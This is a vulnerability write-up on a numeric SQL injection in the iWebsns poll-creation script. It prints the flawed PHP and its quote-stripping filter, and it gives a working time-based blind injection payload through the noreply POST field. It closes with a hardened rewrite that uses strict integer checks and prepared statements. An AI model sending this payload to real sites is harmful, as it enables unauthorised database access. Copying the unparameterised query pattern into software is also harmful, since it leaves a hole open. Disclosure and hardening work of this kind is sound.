SQL injection in the latest version of iWebsns

#Author: 小飞 (PS: as one of this site's editors, and one who has published two articles himself, I can't stand it any more... I still have to X his article)
#Email:f3i@t00ls.net

The problem is in action/poll/poll_add.action.php:

<?php

// pull in the module's shared helper files
require("api/base_support.php");
require("foundation/aintegral.php");

// load the language pack
$pol_langpackage=new polllp;

// permission check
if(!get_argp('action')){
    action_return(0,"$pol_langpackage->pol_error",-1);exit;
}

// variable declarations: every request field goes through short_check()
$user_id=get_sess_userid();
$user_name=get_sess_username();
$userico=get_sess_userico();
$subject=short_check(get_argp('subject'));
$message=short_check(get_argp('message'));
$sex=short_check(get_argp('sex'));
$noreply=short_check(get_argp('noreply'));
$expiration=short_check(get_argp('expiration'));
$reward=short_check(get_argp('reward'));
$credit=short_check(get_argp('credit'));
$percredit=short_check(get_argp('percredit'));
$makefeed=short_check(get_argp('makefeed'));
$maxchoice=short_check(get_argp('maxchoice'));
$cho=array_unique(get_argp('option'));
$tag=short_check(get_argp('tag'));

// table name definitions
$t_poll=$tablePreStr."poll";
$t_polloption=$tablePreStr."polloption";

// select the write database
dbtarget('w',$dbServs);
$dbo=new dbex();

foreach($cho as $value){
    if(short_check($value)!=''){
        $cho_array[]=short_check($value);
    }
}

if($maxchoice==1){
    $input_type='radio';
}else{
    $input_type='checkbox';
}

$poll_option="<input type=\"".$input_type."\" disabled />".$cho_array[0]."<br />";
$poll_option.="<input type=\"".$input_type."\" disabled />".$cho_array[1]."<br />";
$poll_option.="......";

$cho_ser=serialize(array($cho_array[0],$cho_array[1]));

$multiple=($maxchoice==1)? 0 : 1;
// credit and percredit are cast with intval(), so they are safe;
// $maxchoice, $sex and $noreply are spliced in unquoted and uncast
$cre_value=empty($credit) ? 0 : intval($credit);
$per_value=empty($percredit) ? 0 : intval($percredit);

$sql="insert into $t_poll (`user_id`,`username`,`user_ico`,`subject`,`multiple`,`maxchoice`,`sex`,`noreply`,`dateline`,`credit`,`percredit`,`expiration`,`message`,`option`) values ($user_id,'$user_name','$userico','$subject',$multiple,$maxchoice,$sex,$noreply,'".constant('NOWTIME')."',$cre_value,$per_value,'$expiration','$message','$cho_ser')";

$dbo->exeUpdate($sql);

In the SQL statement further down, noreply is inserted as a numeric value (unquoted). There is a filter function in front of it, though, so let's look at short_check:

function short_check($str) {

    $MaxSlen=500; // maximum length of a short input field

    if (!get_magic_quotes_gpc()) { // escape only if magic_quotes_gpc is off
        $str = addslashes($str);
    }

    $str = LenLimit($str,$MaxSlen);

    // strip escaped single quotes, backslashes and '#'
    $str = str_replace(array("\'","\\","#"),"",$str);

    if($str!=''){ $str= htmlspecialchars($str); }

    return preg_replace("/ +/","",trim($str));

}

As you can see, the filtering is fairly thorough: both ' and \ are stripped. But this is a numeric-type injection, where no quote is needed to break out of the value, so the filter does not help. The length is also capped, which is just something to keep in mind. Print the statement:


subject=asd&message=&option[]=qwe&option[]=rty&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&maxchoice=1&expiration=2015-01-27&sex=1&noreply=if(1=1,sleep(3),1),1,0,0,1,1,1);-- s&reward=0&credit=&percredit=&makefeed=1&action=%E7%A1%AE%E5%AE%9A
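The root cause above is a type confusion: a filter built for string contexts (strip quotes, escape, HTML-encode) is applied to values that land in unquoted numeric positions of the INSERT, where a quote is never needed. The following is an added example, not iWebsns code, of how the same handler is hardened with two independent controls: strict integer validation for `maxchoice`, `sex`, `noreply`, `credit` and `percredit`, and a prepared statement so that no request value is ever concatenated into SQL text. The column names follow the INSERT shown above; the table name `iw_poll`, the PDO/SQLite connection, the accepted value ranges and the `YYYY-MM-DD` expiration format are assumptions for this demo.

```php
<?php
// Added example, not iWebsns code: hardened poll_add input handling.
// Table name, PDO connection and value ranges are assumptions for the demo.
declare(strict_types=1);

/**
 * Parse $value as a bare decimal integer in [$min, $max]; return null otherwise.
 * An empty string means "not supplied" and maps to $default, mirroring the
 * original empty($credit) ? 0 : ... behaviour, but without intval(), which
 * would silently turn "1,0,0" into 1 and hide a malformed request.
 */
function strict_int($value, int $min, int $max, ?int $default = null): ?int
{
    if ($value === null || $value === '') {
        return $default;
    }
    if (!is_string($value) || !preg_match('/^-?[0-9]{1,10}$/', trim($value))) {
        return null;
    }
    $n = (int) trim($value);
    return ($n >= $min && $n <= $max) ? $n : null;
}

/**
 * Validate the fields the original INSERT spliced in unquoted. Returns a typed
 * array, or null if any field is malformed. short_check() is irrelevant here:
 * stripping quotes cannot protect a numeric position, only type enforcement can.
 */
function validate_poll_input(array $post): ?array
{
    $clean = [
        'subject'    => trim((string) ($post['subject'] ?? '')),
        'message'    => trim((string) ($post['message'] ?? '')),
        'expiration' => trim((string) ($post['expiration'] ?? '')),
        'maxchoice'  => strict_int($post['maxchoice'] ?? null, 1, 20),
        'sex'        => strict_int($post['sex'] ?? null, 0, 2),
        'noreply'    => strict_int($post['noreply'] ?? null, 0, 1),
        'credit'     => strict_int($post['credit'] ?? null, 0, 1000000, 0),
        'percredit'  => strict_int($post['percredit'] ?? null, 0, 1000000, 0),
    ];
    foreach (['maxchoice', 'sex', 'noreply', 'credit', 'percredit'] as $f) {
        if ($clean[$f] === null) {
            return null;
        }
    }
    // expiration is a date; assumed format YYYY-MM-DD as in the sample request
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $clean['expiration'])) {
        return null;
    }
    return $clean;
}

/**
 * Insert the poll with a prepared statement: every request value is bound, so
 * the SQL text is fixed regardless of input. $table comes from code, never
 * from the request.
 */
function insert_poll(PDO $pdo, string $table, int $userId, string $userName,
                     string $userIco, array $in, array $options): int
{
    $sql = "INSERT INTO `{$table}` (`user_id`,`username`,`user_ico`,`subject`,`multiple`,"
         . "`maxchoice`,`sex`,`noreply`,`dateline`,`credit`,`percredit`,`expiration`,"
         . "`message`,`option`) VALUES (:user_id,:username,:user_ico,:subject,:multiple,"
         . ":maxchoice,:sex,:noreply,:dateline,:credit,:percredit,:expiration,:message,:option)";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([
        ':user_id'    => $userId,
        ':username'   => $userName,
        ':user_ico'   => $userIco,
        ':subject'    => $in['subject'],
        ':multiple'   => $in['maxchoice'] === 1 ? 0 : 1,
        ':maxchoice'  => $in['maxchoice'],
        ':sex'        => $in['sex'],
        ':noreply'    => $in['noreply'],
        ':dateline'   => time(),
        ':credit'     => $in['credit'],
        ':percredit'  => $in['percredit'],
        ':expiration' => $in['expiration'],
        ':message'    => $in['message'],
        ':option'     => serialize(array_values(array_filter(array_map('trim', $options)))),
    ]);
    return (int) $pdo->lastInsertId();
}

// Offline demo against an in-memory SQLite table with the columns used above.
function demo(): array
{
    $pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $pdo->exec("CREATE TABLE iw_poll (id INTEGER PRIMARY KEY, user_id INTEGER, username TEXT,"
             . " user_ico TEXT, subject TEXT, multiple INTEGER, maxchoice INTEGER, sex INTEGER,"
             . " noreply INTEGER, dateline INTEGER, credit INTEGER, percredit INTEGER,"
             . " expiration TEXT, message TEXT, `option` TEXT)");

    // Constructed requests: one well-formed, one whose noreply is not a bare integer.
    $good = ['subject' => 'asd', 'message' => '', 'option' => ['qwe', 'rty', ''],
             'maxchoice' => '1', 'expiration' => '2015-01-27', 'sex' => '1',
             'noreply' => '0', 'credit' => '', 'percredit' => ''];
    $bad  = $good;
    $bad['noreply'] = '1,0,0';   // the original code would have spliced this in verbatim

    $results = [];
    foreach (['good' => $good, 'bad' => $bad] as $label => $post) {
        $in = validate_poll_input($post);
        $results[$label] = $in === null
            ? 'rejected'
            : 'inserted id ' . insert_poll($pdo, 'iw_poll', 42, 'alice', 'a.png', $in, $post['option']);
    }
    return $results;
}

print_r(demo());
```

Either control alone closes this particular hole; keeping both means a future field added to the INSERT without validation is still bound as data, and a future query written without parameters still receives only well-typed integers. Note that `htmlspecialchars()` in `short_check()` is an output-encoding step being done at input time; in the hardened version it belongs at render time, which also stops the stored `subject` from being double-encoded.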
